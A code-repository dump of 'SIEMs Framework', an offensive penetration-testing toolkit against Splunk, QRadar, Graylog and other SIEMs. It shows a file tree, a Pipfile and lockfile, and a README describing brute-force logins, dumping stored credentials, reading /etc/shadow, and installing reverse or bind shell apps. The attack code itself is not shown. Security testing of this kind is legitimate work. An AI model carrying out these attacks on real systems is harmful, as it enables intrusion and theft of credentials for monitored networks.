├── Pipfile ├── Pipfile.lock ├── README.md ├── elasticsiem ├── bruteforcessh.py ├── dict.txt └── sysinfo_elastic.py ├── globals.py ├── graylog ├── alarmcallback.py ├── bruteforcegraylog.py ├── dict.txt ├── obtaincredentialsrestapi.py ├── obtaininputsrestapi.py ├── obtainmongodbcredentials.py └── testcredentialsgraylog.py ├── mcafee ├── bruteforcemcafee.py ├── bruteforcessh.py ├── dict.txt ├── obtainsysteminfo.py ├── obtainuserssystem.py └── obtainwebinfo.py ├── ossim ├── bruteforceossim.py ├── dict.txt ├── maliciousaction.py └── obtainconfigossim.py ├── qradar ├── apikeybruteqradar.py ├── apikeys.txt ├── bruteforceqradar.py ├── dict.txt ├── obtainqradarinfo.py └── userdbqradar.py ├── requirements.txt ├── scanning.py ├── siemonster ├── bfssh_smonster.py ├── dict.txt ├── systeminfo_smonster.py └── usersso_smonster.py ├── siemsframework.py ├── splunk ├── bruteforcesplunk.py ├── bshell.tar.gz ├── dict.txt ├── installshell.py ├── obtainpwds.py ├── obtainsplunkinfo.py ├── obtainsysteminfo.py ├── readfile.py ├── reverse_shell_original.py ├── reverse_shell_win_original.py ├── rshell │ └── default │ │ ├── app.conf │ │ └── inputs.conf ├── testovacredentials.py ├── wadduser.tar.gz ├── wbshell.tar.gz ├── wbshellexe.tar.gz └── wrshell │ └── default │ ├── app.conf │ └── inputs.conf └── test ├── dict.txt ├── scan_mcafee_ssh ├── test_graylog.py ├── test_mcafee.py ├── test_ossim.py ├── test_qradar.py ├── test_scanning.py ├── test_siemonster.py ├── test_siemsframework.py └── test_splunk.py /Pipfile: -------------------------------------------------------------------------------- 1 | [[source]] 2 | name = "pypi" 3 | url = "https://pypi.org/simple" 4 | verify_ssl = true 5 | 6 | [dev-packages] 7 | 8 | [packages] 9 | colorama = "~=0.4.1" 10 | paramiko = "~=2.4.1" 11 | pymongo = "~=3.10.0" 12 | python-nmap = "~=0.6.1" 13 | qradar4py = "~=2.0" 14 | requests = "~=2.19.1" 15 | splunk-sdk = "~=1.6.13" 16 | urllib3 = "~=1.22" 17 | 18 | [requires] 19 | python_version = "3.6" 20 | 
-------------------------------------------------------------------------------- /Pipfile.lock: -------------------------------------------------------------------------------- 1 | { 2 | "_meta": { 3 | "hash": { 4 | "sha256": "3041397e66920107f7c0fa22a979526afcd8cb9d72f971e57ec6a0bc3bfda804" 5 | }, 6 | "pipfile-spec": 6, 7 | "requires": { 8 | "python_version": "3.6" 9 | }, 10 | "sources": [ 11 | { 12 | "name": "pypi", 13 | "url": "https://pypi.org/simple", 14 | "verify_ssl": true 15 | } 16 | ] 17 | }, 18 | "default": { 19 | "bcrypt": { 20 | "hashes": [ 21 | "sha256:0258f143f3de96b7c14f762c770f5fc56ccd72f8a1857a451c1cd9a655d9ac89", 22 | "sha256:0b0069c752ec14172c5f78208f1863d7ad6755a6fae6fe76ec2c80d13be41e42", 23 | "sha256:19a4b72a6ae5bb467fea018b825f0a7d917789bcfe893e53f15c92805d187294", 24 | "sha256:5432dd7b34107ae8ed6c10a71b4397f1c853bd39a4d6ffa7e35f40584cffd161", 25 | "sha256:6305557019906466fc42dbc53b46da004e72fd7a551c044a827e572c82191752", 26 | "sha256:69361315039878c0680be456640f8705d76cb4a3a3fe1e057e0f261b74be4b31", 27 | "sha256:6fe49a60b25b584e2f4ef175b29d3a83ba63b3a4df1b4c0605b826668d1b6be5", 28 | "sha256:74a015102e877d0ccd02cdeaa18b32aa7273746914a6c5d0456dd442cb65b99c", 29 | "sha256:763669a367869786bb4c8fcf731f4175775a5b43f070f50f46f0b59da45375d0", 30 | "sha256:8b10acde4e1919d6015e1df86d4c217d3b5b01bb7744c36113ea43d529e1c3de", 31 | "sha256:9fe92406c857409b70a38729dbdf6578caf9228de0aef5bc44f859ffe971a39e", 32 | "sha256:a190f2a5dbbdbff4b74e3103cef44344bc30e61255beb27310e2aec407766052", 33 | "sha256:a595c12c618119255c90deb4b046e1ca3bcfad64667c43d1166f2b04bc72db09", 34 | "sha256:c9457fa5c121e94a58d6505cadca8bed1c64444b83b3204928a866ca2e599105", 35 | "sha256:cb93f6b2ab0f6853550b74e051d297c27a638719753eb9ff66d1e4072be67133", 36 | "sha256:ce4e4f0deb51d38b1611a27f330426154f2980e66582dc5f438aad38b5f24fc1", 37 | "sha256:d7bdc26475679dd073ba0ed2766445bb5b20ca4793ca0db32b399dccc6bc84b7", 38 | "sha256:ff032765bb8716d9387fd5376d987a937254b0619eff0972779515b5c98820bc" 
39 | ], 40 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 41 | "version": "==3.1.7" 42 | }, 43 | "certifi": { 44 | "hashes": [ 45 | "sha256:5ad7e9a056d25ffa5082862e36f119f7f7cec6457fa07ee2f8c339814b80c9b1", 46 | "sha256:9cd41137dc19af6a5e03b630eefe7d1f458d964d406342dd3edf625839b944cc" 47 | ], 48 | "version": "==2020.4.5.2" 49 | }, 50 | "cffi": { 51 | "hashes": [ 52 | "sha256:001bf3242a1bb04d985d63e138230802c6c8d4db3668fb545fb5005ddf5bb5ff", 53 | "sha256:00789914be39dffba161cfc5be31b55775de5ba2235fe49aa28c148236c4e06b", 54 | "sha256:028a579fc9aed3af38f4892bdcc7390508adabc30c6af4a6e4f611b0c680e6ac", 55 | "sha256:14491a910663bf9f13ddf2bc8f60562d6bc5315c1f09c704937ef17293fb85b0", 56 | "sha256:1cae98a7054b5c9391eb3249b86e0e99ab1e02bb0cc0575da191aedadbdf4384", 57 | "sha256:2089ed025da3919d2e75a4d963d008330c96751127dd6f73c8dc0c65041b4c26", 58 | "sha256:2d384f4a127a15ba701207f7639d94106693b6cd64173d6c8988e2c25f3ac2b6", 59 | "sha256:337d448e5a725bba2d8293c48d9353fc68d0e9e4088d62a9571def317797522b", 60 | "sha256:399aed636c7d3749bbed55bc907c3288cb43c65c4389964ad5ff849b6370603e", 61 | "sha256:3b911c2dbd4f423b4c4fcca138cadde747abdb20d196c4a48708b8a2d32b16dd", 62 | "sha256:3d311bcc4a41408cf5854f06ef2c5cab88f9fded37a3b95936c9879c1640d4c2", 63 | "sha256:62ae9af2d069ea2698bf536dcfe1e4eed9090211dbaafeeedf5cb6c41b352f66", 64 | "sha256:66e41db66b47d0d8672d8ed2708ba91b2f2524ece3dee48b5dfb36be8c2f21dc", 65 | "sha256:675686925a9fb403edba0114db74e741d8181683dcf216be697d208857e04ca8", 66 | "sha256:7e63cbcf2429a8dbfe48dcc2322d5f2220b77b2e17b7ba023d6166d84655da55", 67 | "sha256:8a6c688fefb4e1cd56feb6c511984a6c4f7ec7d2a1ff31a10254f3c817054ae4", 68 | "sha256:8c0ffc886aea5df6a1762d0019e9cb05f825d0eec1f520c51be9d198701daee5", 69 | "sha256:95cd16d3dee553f882540c1ffe331d085c9e629499ceadfbda4d4fde635f4b7d", 70 | "sha256:99f748a7e71ff382613b4e1acc0ac83bf7ad167fb3802e35e90d9763daba4d78", 71 | 
"sha256:b8c78301cefcf5fd914aad35d3c04c2b21ce8629b5e4f4e45ae6812e461910fa", 72 | "sha256:c420917b188a5582a56d8b93bdd8e0f6eca08c84ff623a4c16e809152cd35793", 73 | "sha256:c43866529f2f06fe0edc6246eb4faa34f03fe88b64a0a9a942561c8e22f4b71f", 74 | "sha256:cab50b8c2250b46fe738c77dbd25ce017d5e6fb35d3407606e7a4180656a5a6a", 75 | "sha256:cef128cb4d5e0b3493f058f10ce32365972c554572ff821e175dbc6f8ff6924f", 76 | "sha256:cf16e3cf6c0a5fdd9bc10c21687e19d29ad1fe863372b5543deaec1039581a30", 77 | "sha256:e56c744aa6ff427a607763346e4170629caf7e48ead6921745986db3692f987f", 78 | "sha256:e577934fc5f8779c554639376beeaa5657d54349096ef24abe8c74c5d9c117c3", 79 | "sha256:f2b0fa0c01d8a0c7483afd9f31d7ecf2d71760ca24499c8697aeb5ca37dc090c" 80 | ], 81 | "version": "==1.14.0" 82 | }, 83 | "chardet": { 84 | "hashes": [ 85 | "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae", 86 | "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691" 87 | ], 88 | "version": "==3.0.4" 89 | }, 90 | "colorama": { 91 | "hashes": [ 92 | "sha256:7d73d2a99753107a36ac6b455ee49046802e59d9d076ef8e47b61499fa29afff", 93 | "sha256:e96da0d330793e2cb9485e9ddfd918d456036c7149416295932478192f4436a1" 94 | ], 95 | "index": "pypi", 96 | "version": "==0.4.3" 97 | }, 98 | "cryptography": { 99 | "hashes": [ 100 | "sha256:091d31c42f444c6f519485ed528d8b451d1a0c7bf30e8ca583a0cac44b8a0df6", 101 | "sha256:18452582a3c85b96014b45686af264563e3e5d99d226589f057ace56196ec78b", 102 | "sha256:1dfa985f62b137909496e7fc182dac687206d8d089dd03eaeb28ae16eec8e7d5", 103 | "sha256:1e4014639d3d73fbc5ceff206049c5a9a849cefd106a49fa7aaaa25cc0ce35cf", 104 | "sha256:22e91636a51170df0ae4dcbd250d318fd28c9f491c4e50b625a49964b24fe46e", 105 | "sha256:3b3eba865ea2754738616f87292b7f29448aec342a7c720956f8083d252bf28b", 106 | "sha256:651448cd2e3a6bc2bb76c3663785133c40d5e1a8c1a9c5429e4354201c6024ae", 107 | "sha256:726086c17f94747cedbee6efa77e99ae170caebeb1116353c6cf0ab67ea6829b", 108 | 
"sha256:844a76bc04472e5135b909da6aed84360f522ff5dfa47f93e3dd2a0b84a89fa0", 109 | "sha256:88c881dd5a147e08d1bdcf2315c04972381d026cdb803325c03fe2b4a8ed858b", 110 | "sha256:96c080ae7118c10fcbe6229ab43eb8b090fccd31a09ef55f83f690d1ef619a1d", 111 | "sha256:a0c30272fb4ddda5f5ffc1089d7405b7a71b0b0f51993cb4e5dbb4590b2fc229", 112 | "sha256:bb1f0281887d89617b4c68e8db9a2c42b9efebf2702a3c5bf70599421a8623e3", 113 | "sha256:c447cf087cf2dbddc1add6987bbe2f767ed5317adb2d08af940db517dd704365", 114 | "sha256:c4fd17d92e9d55b84707f4fd09992081ba872d1a0c610c109c18e062e06a2e55", 115 | "sha256:d0d5aeaedd29be304848f1c5059074a740fa9f6f26b84c5b63e8b29e73dfc270", 116 | "sha256:daf54a4b07d67ad437ff239c8a4080cfd1cc7213df57d33c97de7b4738048d5e", 117 | "sha256:e993468c859d084d5579e2ebee101de8f5a27ce8e2159959b6673b418fd8c785", 118 | "sha256:f118a95c7480f5be0df8afeb9a11bd199aa20afab7a96bcf20409b411a3a85f0" 119 | ], 120 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", 121 | "version": "==2.9.2" 122 | }, 123 | "idna": { 124 | "hashes": [ 125 | "sha256:156a6814fb5ac1fc6850fb002e0852d56c0c8d2531923a51032d1b70760e186e", 126 | "sha256:684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16" 127 | ], 128 | "version": "==2.7" 129 | }, 130 | "paramiko": { 131 | "hashes": [ 132 | "sha256:34fb64705ba3d1d5cd20b4fda16377b5ea3c84f5d74356543ecf2263c7fbc9b8", 133 | "sha256:c6de454b3be8d35100d95d62b8073e429ed35326d574649f173c0acf7d72b2eb" 134 | ], 135 | "index": "pypi", 136 | "version": "==2.4.3" 137 | }, 138 | "pyasn1": { 139 | "hashes": [ 140 | "sha256:014c0e9976956a08139dc0712ae195324a75e142284d5f87f1a87ee1b068a359", 141 | "sha256:03840c999ba71680a131cfaee6fab142e1ed9bbd9c693e285cc6aca0d555e576", 142 | "sha256:0458773cfe65b153891ac249bcf1b5f8f320b7c2ce462151f8fa74de8934becf", 143 | "sha256:08c3c53b75eaa48d71cf8c710312316392ed40899cb34710d092e96745a358b7", 144 | "sha256:39c7e2ec30515947ff4e87fb6f456dfc6e84857d34be479c9d4a4ba4bf46aa5d", 145 | 
"sha256:5c9414dcfede6e441f7e8f81b43b34e834731003427e5b09e4e00e3172a10f00", 146 | "sha256:6e7545f1a61025a4e58bb336952c5061697da694db1cae97b116e9c46abcf7c8", 147 | "sha256:78fa6da68ed2727915c4767bb386ab32cdba863caa7dbe473eaae45f9959da86", 148 | "sha256:7ab8a544af125fb704feadb008c99a88805126fb525280b2270bb25cc1d78a12", 149 | "sha256:99fcc3c8d804d1bc6d9a099921e39d827026409a58f2a720dcdb89374ea0c776", 150 | "sha256:aef77c9fb94a3ac588e87841208bdec464471d9871bd5050a287cc9a475cd0ba", 151 | "sha256:e89bf84b5437b532b0803ba5c9a5e054d21fec423a89952a74f87fa2c9b7bce2", 152 | "sha256:fec3e9d8e36808a28efb59b489e4528c10ad0f480e57dcc32b4de5c9d8c9fdf3" 153 | ], 154 | "version": "==0.4.8" 155 | }, 156 | "pycparser": { 157 | "hashes": [ 158 | "sha256:2d475327684562c3a96cc71adf7dc8c4f0565175cf86b6d7a404ff4c771f15f0", 159 | "sha256:7582ad22678f0fcd81102833f60ef8d0e57288b6b5fb00323d101be910e35705" 160 | ], 161 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 162 | "version": "==2.20" 163 | }, 164 | "pymongo": { 165 | "hashes": [ 166 | "sha256:01b4e10027aef5bb9ecefbc26f5df3368ce34aef81df43850f701e716e3fe16d", 167 | "sha256:0fc5aa1b1acf7f61af46fe0414e6a4d0c234b339db4c03a63da48599acf1cbfc", 168 | "sha256:1396eb7151e0558b1f817e4b9d7697d5599e5c40d839a9f7270bd90af994ad82", 169 | "sha256:18e84a3ec5e73adcb4187b8e5541b2ad61d716026ed9863267e650300d8bea33", 170 | "sha256:19adf2848b80cb349b9891cc854581bbf24c338be9a3260e73159bdeb2264464", 171 | "sha256:20ee0475aa2ba437b0a14806f125d696f90a8433d820fb558fdd6f052acde103", 172 | "sha256:26798795097bdeb571f13942beef7e0b60125397811c75b7aa9214d89880dd1d", 173 | "sha256:26e707a4eb851ec27bb969b5f1413b9b2eac28fe34271fa72329100317ea7c73", 174 | "sha256:2a3c7ad01553b27ec553688a1e6445e7f40355fb37d925c11fcb50b504e367f8", 175 | "sha256:2f07b27dbf303ea53f4147a7922ce91a26b34a0011131471d8aaf73151fdee9a", 176 | "sha256:316f0cf543013d0c085e15a2c8abe0db70f93c9722c0f99b6f3318ff69477d70", 177 | 
"sha256:31d11a600eea0c60de22c8bdcb58cda63c762891facdcb74248c36713240987f", 178 | "sha256:334ef3ffd0df87ea83a0054454336159f8ad9c1b389e19c0032d9cb8410660e6", 179 | "sha256:358ba4693c01022d507b96a980ded855a32dbdccc3c9331d0667be5e967f30ed", 180 | "sha256:3a6568bc53103df260f5c7d2da36dffc5202b9a36c85540bba1836a774943794", 181 | "sha256:444bf2f44264578c4085bb04493bfed0e5c1b4fe7c2704504d769f955cc78fe4", 182 | "sha256:47a00b22c52ee59dffc2aad02d0bbfb20c26ec5b8de8900492bf13ad6901cf35", 183 | "sha256:4c067db43b331fc709080d441cb2e157114fec60749667d12186cc3fc8e7a951", 184 | "sha256:4c092310f804a5d45a1bcaa4191d6d016c457b6ed3982a622c35f729ff1c7f6b", 185 | "sha256:53b711b33134e292ef8499835a3df10909c58df53a2a0308f598c432e9a62892", 186 | "sha256:568d6bee70652d8a5af1cd3eec48b4ca1696fb1773b80719ebbd2925b72cb8f6", 187 | "sha256:56fa55032782b7f8e0bf6956420d11e2d4e9860598dfe9c504edec53af0fc372", 188 | "sha256:5a2c492680c61b440272341294172fa3b3751797b1ab983533a770e4fb0a67ac", 189 | "sha256:61235cc39b5b2f593086d1d38f3fc130b2d125bd8fc8621d35bc5b6bdeb92bd2", 190 | "sha256:619ac9aaf681434b4d4718d1b31aa2f0fce64f2b3f8435688fcbdc0c818b6c54", 191 | "sha256:6238ac1f483494011abde5286282afdfacd8926659e222ba9b74c67008d3a58c", 192 | "sha256:63752a72ca4d4e1386278bd43d14232f51718b409e7ac86bcf8810826b531113", 193 | "sha256:6fdc5ccb43864065d40dd838437952e9e3da9821b7eac605ba46ada77f846bdf", 194 | "sha256:7abc3a6825a346fa4621a6f63e3b662bbb9e0f6ffc32d30a459d695f20fb1a8b", 195 | "sha256:7aef381bb9ae8a3821abd7f9d4d93978dbd99072b48522e181baeffcd95b56ae", 196 | "sha256:80df3caf251fe61a3f0c9614adc6e2bfcffd1cd3345280896766712fb4b4d6d7", 197 | "sha256:95f970f34b59987dee6f360d2e7d30e181d58957b85dff929eee4423739bd151", 198 | "sha256:993257f6ca3cde55332af1f62af3e04ca89ce63c08b56a387cdd46136c72f2fa", 199 | "sha256:9c0a57390549affc2b5dda24a38de03a5c7cbc58750cd161ff5d106c3c6eec80", 200 | "sha256:a0794e987d55d2f719cc95fcf980fc62d12b80e287e6a761c4be14c60bd9fecc", 201 | 
"sha256:a3b98121e68bf370dd8ea09df67e916f93ea95b52fc010902312168c4d1aff5d", 202 | "sha256:a60756d55f0887023b3899e6c2923ba5f0042fb11b1d17810b4e07395404f33e", 203 | "sha256:a676bd2fbc2309092b9bbb0083d35718b5420af3a42135ebb1e4c3633f56604d", 204 | "sha256:a732838c78554c1257ff2492f5c8c4c7312d0aecd7f732149e255f3749edd5ee", 205 | "sha256:ad3dc88dfe61f0f1f9b99c6bc833ea2f45203a937a18f0d2faa57c6952656012", 206 | "sha256:ae65d65fde4135ef423a2608587c9ef585a3551fc2e4e431e7c7e527047581be", 207 | "sha256:b070a4f064a9edb70f921bfdc270725cff7a78c22036dd37a767c51393fb956f", 208 | "sha256:b6da85949aa91e9f8c521681344bd2e163de894a5492337fba8b05c409225a4f", 209 | "sha256:bbf47110765b2a999803a7de457567389253f8670f7daafb98e059c899ce9764", 210 | "sha256:bd9c1e6f92b4888ae3ef7ae23262c513b962f09f3fb3b48581dde5df7d7a860a", 211 | "sha256:c06b3f998d2d7160db58db69adfb807d2ec307e883e2f17f6b87a1ef6c723f11", 212 | "sha256:c318fb70542be16d3d4063cde6010b1e4d328993a793529c15a619251f517c39", 213 | "sha256:c4aef42e5fa4c9d5a99f751fb79caa880dac7eaf8a65121549318b984676a1b7", 214 | "sha256:c9ca545e93a9c2a3bdaa2e6e21f7a43267ff0813e8055adf2b591c13164c0c57", 215 | "sha256:da2c3220eb55c4239dd8b982e213da0b79023cac59fe54ca09365f2bc7e4ad32", 216 | "sha256:dd8055da300535eefd446b30995c0813cc4394873c9509323762a93e97c04c03", 217 | "sha256:e2b46e092ea54b732d98c476720386ff2ccd126de1e52076b470b117bff7e409", 218 | "sha256:e334c4f39a2863a239d38b5829e442a87f241a92da9941861ee6ec5d6380b7fe", 219 | "sha256:e5c54f04ca42bbb5153aec5d4f2e3d9f81e316945220ac318abd4083308143f5", 220 | "sha256:f4d06764a06b137e48db6d569dc95614d9d225c89842c885669ee8abc9f28c7a", 221 | "sha256:f96333f9d2517c752c20a35ff95de5fc2763ac8cdb1653df0f6f45d281620606" 222 | ], 223 | "index": "pypi", 224 | "version": "==3.10.1" 225 | }, 226 | "pynacl": { 227 | "hashes": [ 228 | "sha256:06cbb4d9b2c4bd3c8dc0d267416aaed79906e7b33f114ddbf0911969794b1cc4", 229 | "sha256:11335f09060af52c97137d4ac54285bcb7df0cef29014a1a4efe64ac065434c4", 230 | 
"sha256:2fe0fc5a2480361dcaf4e6e7cea00e078fcda07ba45f811b167e3f99e8cff574", 231 | "sha256:30f9b96db44e09b3304f9ea95079b1b7316b2b4f3744fe3aaecccd95d547063d", 232 | "sha256:511d269ee845037b95c9781aa702f90ccc36036f95d0f31373a6a79bd8242e25", 233 | "sha256:537a7ccbea22905a0ab36ea58577b39d1fa9b1884869d173b5cf111f006f689f", 234 | "sha256:54e9a2c849c742006516ad56a88f5c74bf2ce92c9f67435187c3c5953b346505", 235 | "sha256:757250ddb3bff1eecd7e41e65f7f833a8405fede0194319f87899690624f2122", 236 | "sha256:7757ae33dae81c300487591c68790dfb5145c7d03324000433d9a2c141f82af7", 237 | "sha256:7c6092102219f59ff29788860ccb021e80fffd953920c4a8653889c029b2d420", 238 | "sha256:8122ba5f2a2169ca5da936b2e5a511740ffb73979381b4229d9188f6dcb22f1f", 239 | "sha256:9c4a7ea4fb81536c1b1f5cc44d54a296f96ae78c1ebd2311bd0b60be45a48d96", 240 | "sha256:cd401ccbc2a249a47a3a1724c2918fcd04be1f7b54eb2a5a71ff915db0ac51c6", 241 | "sha256:d452a6746f0a7e11121e64625109bc4468fc3100452817001dbe018bb8b08514", 242 | "sha256:ea6841bc3a76fa4942ce00f3bda7d436fda21e2d91602b9e21b7ca9ecab8f3ff", 243 | "sha256:f8851ab9041756003119368c1e6cd0b9c631f46d686b3904b18c0139f4419f80" 244 | ], 245 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 246 | "version": "==1.4.0" 247 | }, 248 | "python-nmap": { 249 | "hashes": [ 250 | "sha256:80ba0eb10a52283a54a633f40b5baa9c2ff08675d6621dd089ead942852f5bd3" 251 | ], 252 | "index": "pypi", 253 | "version": "==0.6.1" 254 | }, 255 | "qradar4py": { 256 | "hashes": [ 257 | "sha256:0b812c7810f6f69dd35b180816c01e23a0363aee2d1c7c5537d6231c0652b731", 258 | "sha256:3835c81f7b92b6f09eb11cd7c8cfa50cd0b41d206d6486301037b9f607a6adfe" 259 | ], 260 | "index": "pypi", 261 | "version": "==2.0" 262 | }, 263 | "requests": { 264 | "hashes": [ 265 | "sha256:63b52e3c866428a224f97cab011de738c36aec0185aa91cfacd418b5d58911d1", 266 | "sha256:ec22d826a36ed72a7358ff3fe56cbd4ba69dd7a6718ffd450ff0e9df7a47ce6a" 267 | ], 268 | "index": "pypi", 269 | "version": "==2.19.1" 270 | }, 271 | "six": 
{ 272 | "hashes": [ 273 | "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", 274 | "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" 275 | ], 276 | "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", 277 | "version": "==1.15.0" 278 | }, 279 | "splunk-sdk": { 280 | "hashes": [ 281 | "sha256:e2242b02a3c9bd0713829ce046200802462eb67bf413e0086dc04c15bde31a11", 282 | "sha256:f2968cd650b72e2831abe5e4b86e347d476dc82b787aeecaaa5da37bd1a16ae7" 283 | ], 284 | "index": "pypi", 285 | "version": "==1.6.13" 286 | }, 287 | "urllib3": { 288 | "hashes": [ 289 | "sha256:a68ac5e15e76e7e5dd2b8f94007233e01effe3e50e8daddf69acfd81cb686baf", 290 | "sha256:b5725a0bd4ba422ab0e66e89e030c806576753ea3ee08554382c14e685d117b5" 291 | ], 292 | "index": "pypi", 293 | "version": "==1.23" 294 | } 295 | }, 296 | "develop": {} 297 | } 298 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SIEMS FRAMEWORK 2 | 3 | MultiSIEM Modular Python3 Attack Framework 4 | By ElevenPaths https://www.elevenpaths.com/ 5 | Usage: python3 ./siemsframework.py 6 | 7 | ## INTRODUCTION 8 | 9 | SIEMs are defensive tools increasingly used in the field of cybersecurity, especially by major companies and companies intended to monitor highly critical systems and networks. However, from the point of view of an attacker, those permissions granted to SIEMs on systems and accounts from corporate networks are high. Moreover, administrative access to SIEMs may be used to obtain code execution on the server where such SIEM is installed, and sometimes also on client machines, considering that a SIEM collects events such as Active Directory servers, AWS servers, Data Bases and network devices (for example, Firewalls and Routers). 
10 | 11 | During our investigation, we identified a large number of attack vectors that can be used against the various SIEMs to compromise them, for instance: 12 | 13 | • Obtain user accounts and passwords stored in the SIEM for critical systems (LDAP/AD servers, databases, network devices, AWS servers). 14 | 15 | • Develop and install malicious applications such as Windows/Linux reverse shells, Windows/Linux bind shells or malicious scripts with the aim of compromising the server where the SIEM is installed. 16 | 17 | • Develop and install malicious applications such as Windows/Linux reverse shells, Windows/Linux bind shells or malicious scripts with the aim of compromising the machines from which the SIEM collects events. 18 | 19 | • Create and apply malicious actions or notifications that execute commands when a given event occurs, for example with the purpose of obtaining a reverse shell on the server where the SIEM is installed. 20 | 21 | • Take advantage of default passwords and weaknesses in the SIEM OVA image configuration to obtain admin credentials for the server, the database or even the SIEM web interface itself. 22 | 23 | • Perform dictionary or brute-force attacks against the web or admin interface, or against the SIEM client software, to obtain admin credentials. 24 | 25 | • Read arbitrary files from the server where the SIEM is installed. 26 | 27 | • Obtain SIEM configuration information and other relevant parameters to perform further attacks. 28 | 29 | On the basis of the investigation results, the Open Source SIEMs Framework tool was developed. It is a modular tool written in Python3 by the Innovation and Laboratory team of ElevenPaths. It automates attacks against various SIEMs on the market (both commercial and open source). Because these attacks are intrusive (dictionary attacks, installing applications, creating alert actions that execute commands), run the tool only against systems you are explicitly authorized to test. 30 | 31 | SIEMs Framework supports multiple attack payloads that may be selected according to the SIEM to be attacked and its operating system.
There are payloads available in PowerShell, Python, Bash, Exe, and more formats. Once the selected attack is executed, the tool shows the results on the screen, and it is possible to go back and execute any other attack on the same SIEM or select another SIEM to compromise. It has a simple, easy-to-use and intuitive interface. Currently it can be used with the following SIEMs: Splunk, Graylog, OSSIM, QRadar and McAfee (see the attack module sections below; the repository also contains siemonster and elasticsiem module directories that are not documented here). 32 | 33 | ## DOWNLOADING, REQUIREMENTS AND INSTALLATION 34 | 35 | SIEMs Framework can be downloaded from our GitHub by downloading the .zip file or cloning the repository. It has the following requirements, which can be installed with pip3 install -r requirements.txt (a Pipfile/Pipfile.lock for pipenv is also provided; note that it pins older releases of requests, urllib3 and paramiko and does not include pandas or requests_mock, so refresh the pins before use): 36 | 37 | • splunk-sdk 38 | 39 | • requests 40 | 41 | • python-nmap (a wrapper around the nmap binary, which must be installed separately and available on the PATH) 42 | 43 | • colorama 44 | 45 | • pandas 46 | 47 | • paramiko 48 | 49 | • pymongo 50 | 51 | • qradar4py 52 | 53 | • requests_mock 54 | 55 | • urllib3 56 | 57 | Once the requirements are installed, the tool can be used as follows: python3 ./siemsframework.py 58 | 59 | ## TOOL USAGE 60 | 61 | When the tool is executed, the main menu is displayed, where you must select whether to scan a specific IP where a SIEM may be running, or a network, to detect the SIEMs within it. For scanning and detecting the SIEM on a specific IP address use option 1, and for scanning a network use option 2. 62 | 63 | ### Scanning a specific IP 64 | By selecting option 1 “Scan and Detect SIEM”, the tool requests the IP address so it can scan the specific ports of the supported SIEMs and connect to either the web or management interface in order to verify that it is really a SIEM. 65 | 66 | Once the SIEM has been detected by following the above methods, the tool shows the detected SIEM in red and gives you the option to launch the attack module for that SIEM. 67 | 68 | ### Network Scanning 69 | By selecting option 2 “Find SIEMs on the network” the tool requests the network to be scanned in CIDR notation, for instance: 192.168.137.0/24.
Once the information is entered, SIEMs Framework first performs a discovery to detect the active systems; then the default ports of the supported SIEMs are scanned, and finally it connects to either the web or management interface of each of those systems in order to verify that it is really a SIEM. 70 | 71 | Once the SIEMs have been detected by following the above methods, the tool shows the detected SIEMs in red and requests the IP address of the SIEM to be attacked. 72 | 73 | 74 | ### Splunk Attack Modules 75 | 76 | By entering “y” and selecting the launch of the Splunk attack modules, the tool shows all the possible attacks that can be performed against this SIEM. For the first two attacks no credentials are required; attacks 3, 4, 5 and 7 need Splunk admin credentials (see each module below). 77 | 78 | #### 1st Attack: Dictionary Attack on Splunk Admin Interface 79 | This attack module contains a specific dictionary for Splunk named dict.txt, which is made up of the 100 most used passwords of 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. If you wish to use a different list, /splunk/dict.txt can be replaced with any other word list, provided that the file name is kept. Splunk's password policy does not apply to users with the admin role, so password restrictions and account lockout after unsuccessful login attempts do not apply to them; note, however, that the failed attempts are still likely to appear in the target's own logs, so this attack is noisy.
80 | Before starting the dictionary attack, the tool checks whether the Splunk instance under analysis is the Free version, which does not use any authentication, or whether it still has the default password “changeme” of the oldest versions of this software. 81 | 82 | #### 2nd Attack: Obtain Server and Session Information via Web Interface 83 | If the Splunk server under analysis has the web interface active, this module obtains server and session information from the web interface itself without needing to authenticate. 8000 is the default port of the Splunk web interface; to use this module it is necessary to know and enter the port where the web interface is published. 84 | 85 | #### 3rd Attack: Obtain System Information via Management Port 86 | This module can be used on a Splunk Server or Universal Forwarder. To use it, Splunk admin credentials are needed; they can be obtained for instance through a dictionary attack (1st attack). The result of the module is information about the current Splunk installation: version, operating system, Splunk configuration and more. 87 | 88 | #### 4th Attack: Obtain Splunk Stored Passwords 89 | This module is only used on Splunk servers. To use it, Splunk admin credentials are needed; they can be obtained for instance through a dictionary attack (1st attack). The result of the module is all the credentials stored by the apps used on Splunk to connect to the devices from which events are obtained. These are credentials for third-party systems, so treat the output as sensitive material. 90 | 91 | #### 5th Attack: Read /etc/shadow file from Splunk server (Linux only) 92 | This module can be used on a Linux Splunk Server. To use it, Splunk admin credentials are needed; they can be obtained for instance through a dictionary attack (1st attack). The module loads the file into a Splunk index, and its result is the content of the file /etc/shadow from the server where Splunk is installed. Note that a copy of the file will presumably remain in that index on the target after the module runs; remove it during cleanup.
93 | 94 | #### 6th Attack: Deployment of Malicious Applications to UF 95 | This module will be available in the next version of SIEMs Framework. For now, to compromise Universal Forwarders, attack 1 can be used to obtain credentials and then attack 7 to install malicious applications depending on the platform. 96 | #### 7th Attack: Install Malicious Application to Compromise Splunk/UF Server 97 | This attack module builds and installs on Splunk a malicious application designed to compromise the target system. First, the type of payload must be selected according to the operating system and the type of Splunk instance to attack (Splunk Server or Universal Forwarder). You can use a Linux Python Reverse or Bind Shell for Splunk Server or UF; a Windows Python Reverse or Bind Shell for Splunk Server (where Python is installed by default); and an Executable Bind Shell or a script that adds an admin user on Windows Universal Forwarders (where Python is not installed by default). Then the username, Splunk admin password and the 